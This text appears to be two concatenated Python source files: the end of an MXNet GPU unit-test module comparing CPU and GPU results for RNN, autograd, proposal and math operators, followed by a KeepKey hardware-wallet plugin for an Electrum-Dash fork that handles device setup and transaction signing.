def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go, co, rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g, c, rtol=1e-2, atol=1e-6)
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.copy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad)
@with_seed()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% gurantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'):
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'):
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), {'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
@with_seed()
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
if req_dict['data'] is 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
if req_dict['grid'] is 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym.bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@unittest.skip('skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@unittest.skip('skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : str(seg_sizes[0]),
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : str(seg_sizes[1]),
'MXNET_EXEC_BULK_EXEC_TRAIN' : str(seg_sizes[2])},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z.simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
def test_fp16_spmm():
inp = mxsps.csr_matrix(sps.coo_matrix(([2.0], ([150], [100000]))).tocsr())
inp = inp.astype('float16', copy=False)
weight = mx.nd.random.randn(100001, 151)
weight = weight.astype('float16', copy=False)
out = mxsps.dot(inp, weight)
out_np = mx.nd.dot(inp, weight)
assert_almost_equal(out.asnumpy(), out_np, rtol=1e-3, atol=1e-5)
if __name__ == '__main__':
import nose
nose.runmodule()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_dash.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_dash.bip32 import BIP32Node
from electrum_dash import constants
from electrum_dash.dash_tx import to_varbytes, serialize_extra_payload
from electrum_dash.i18n import _
from electrum_dash.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_dash.keystore import Hardware_KeyStore
from electrum_dash.plugin import Device, runs_in_hwd_thread
from electrum_dash.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None:
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Xazab Testnet" if constants.net.TESTNET else "Xazab"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
